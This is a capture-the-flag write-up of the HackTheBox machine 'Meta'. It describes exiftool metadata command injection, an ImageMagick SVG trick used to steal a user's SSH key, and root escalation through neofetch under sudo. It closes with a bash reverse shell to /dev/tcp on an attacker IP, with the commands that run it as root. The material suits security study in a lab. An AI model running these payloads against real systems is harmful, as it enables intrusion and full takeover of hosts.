Meta HackTheBox Writeup


We run nmap on all ports with scripts and software versions. We see that the web service redirects to the domain artcorp.htb, we insert it in our /etc/hosts file.


We tested access at both sites, but they lead to the same destination.

Viewing website:

We list three possible relevant users in the company:

We also see that they are promoting a new product called “MetaView” (the machine is called Meta, so it could be a clue).

We launch the wfuzz tool and enumerate a subdomain “dev01.artcorp.htb”:

We access the website, find a link to the tool they are developing.


There appears to be a file upload field and it displays metadata.

If we look at the result, it is very similar to the output of the exiftool:


We perform the same process of the exploit and insert a system command (“ls -lna”) in the image metadata:

We upload the image and see that the command is executed on the machine:

Since we had to put all the code in the metadata, I found it easier to encode the payload in base64.

We insert the base64 payload, add decoding and execution on the victim machine:

We listen in with a netcat and gain access to the machine:

We tried to read the user flag, but we do not have permissions.

We run pspy and see that a script called “” is executed:

Visualizing content:

The script takes the inserted content of the path “/var/www/dev01.artcorp.htb/convert_images/” and executes it with mogrify accepting any file:

So I checked the version and did some research:

So, I used the following file to copy the SSH private key of the user “thomas” and inserted it in a m3.svg file in the path “/var/www/dev01.artcorp.htb/convert_images/” and we only had to wait for the script to run it in a few minutes.

We wait a few minutes and see that we have obtained the “id_rsa” file of the user Thomas:

Privilege Escalation

We connect via SSH with the private key and read the user flag.

We also see that we can run as the root user the “neofetch” binary.

We searched gtfobins/neofetch/ and found ways to exploit this binary.

We can see that there is a configuration file for this binary in our folder.

We insert our reverse shell into our neofetch configuration file:

We put a netcat listening on port 443 and execute the two commands through the terminal. We will gain root access and read the flag.

Explotation code:

# Reverse shell /home/thomas/.config/neofetch/config.php
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.XX.XX/443 0>&1"

# Terminal execution
export XDG_CONFIG_HOME="$HOME/.config"
sudo -u root /usr/bin/neofetch \"\"